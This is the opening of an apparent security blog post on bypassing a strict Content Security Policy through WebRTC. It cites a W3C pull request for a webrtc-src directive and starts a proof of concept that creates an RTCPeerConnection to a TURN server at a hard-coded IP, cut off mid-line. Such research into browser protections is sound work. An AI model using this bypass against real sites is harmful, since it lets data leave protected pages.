Bypassing strict CSP by abusing WebRTC

I noticed recently that there was a PR in the w3c github organisation on both the webappsec-csp and webrtc-pc specification repos adding a new webrtc-src repo. The PR in question: Extracted POC: var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=…